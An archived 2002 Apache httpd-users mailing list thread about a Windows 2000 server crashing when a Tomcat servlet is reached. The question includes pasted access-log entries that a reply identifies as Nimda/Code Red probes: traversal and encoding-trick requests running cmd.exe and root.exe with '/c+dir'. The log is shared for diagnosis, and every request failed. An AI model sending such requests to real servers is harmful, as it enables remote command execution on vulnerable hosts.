httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "John Darin Holloway" <jdhollo...@blue.net>
Subject Re: accessing a servlet through apache-tomcat causes blue screen crash / memory dump (win2000 server)
Date Tue, 29 Jan 2002 18:04:15 GMT
The access log entries are from a nimda/code red probe, but you aren't
running IIS so don't worry about those.  Someone else will have to take the
tomcat side of the question though.

John Darin Holloway
Bluegrass Network, LLC


----- Original Message -----
From: "Milan Trninic" <mtrninic@galdosinc.com>
To: <users@httpd.apache.org>
Sent: Tuesday, January 29, 2002 11:42 AM
Subject: accessing a servlet through apache-tomcat causes blue screen crash
/ memory dump (win2000 server)


Has somebody experienced this one? I have tried to figure it out but still
have no clue.
The problem is that there are no log messages anywhere, for example Windows
Event Viewer only logs that system has crashed AFTER the crash.
I am certain that it happens when the servlet is accessed (not sure
preciselly at what moment). It also happens sometimes when I stop Tomcat
service.
Another interesting symptom is this: If I access the web site RIGHT AFTER
the machine reboots, it doesn't crash, and any subsequent hits don't cause
problems. But if I just reboot the machine (which starts Tomcat then Apache
service) and just leave it, it is almost certain that if somebody hits the
page after some 15 min (not sure about this time) that it will crash.
Both Apache and Tomcat are services that are started in this sequence
1. start Tomcat
2. wait until Tomcat updates conf-auto files or 30 sec whichever is first
3. start Apache

Also, there is something interesting in my log files, but I think it is not
related to the first problem. I have found these lines in my access.log:

IP Address - - [29/Jan/2002:06:34:39 -0800] "GET /scripts/root.exe?/c+dir
HTTP/1.0" 404 283
IP Address - - [29/Jan/2002:06:34:39 -0800] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 281
IP Address - - [29/Jan/2002:06:34:40 -0800] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
IP Address - - [29/Jan/2002:06:34:40 -0800] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
IP Address - - [29/Jan/2002:06:34:40 -0800] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
IP Address - - [29/Jan/2002:06:34:40 -0800] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 322
IP Address - - [29/Jan/2002:06:34:40 -0800] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 322
IP Address - - [29/Jan/2002:06:34:41 -0800] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 404 338
IP Address - - [29/Jan/2002:06:34:41 -0800] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 308
IP Address - - [29/Jan/2002:06:34:41 -0800] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
IP Address - - [29/Jan/2002:06:34:41 -0800] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
IP Address - - [29/Jan/2002:06:34:41 -0800] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
IP Address - - [29/Jan/2002:06:34:41 -0800] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
IP Address - - [29/Jan/2002:06:34:42 -0800] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
IP Address - - [29/Jan/2002:06:34:42 -0800] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
IP Address - - [29/Jan/2002:06:34:42 -0800] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305

The error.log file reports "File doesn't exist" for all of these requests,
so I figured everything is ok, somebody is probably trying something funny
but didn't succeed so I haven't really look for explanation of these lines.
But if somebody have seen them, I'd like to hear.

Help would be greatly appreciated

Milan Trninic



----------------------------------------------------------------------------
----


> ---------------------------------------------------------------------
> The official User-To-User support forum of the Apache HTTP Server Project.
> See <URL:http://httpd.apache.org/userslist.html> for more info.
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org


---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org


Mime
View raw message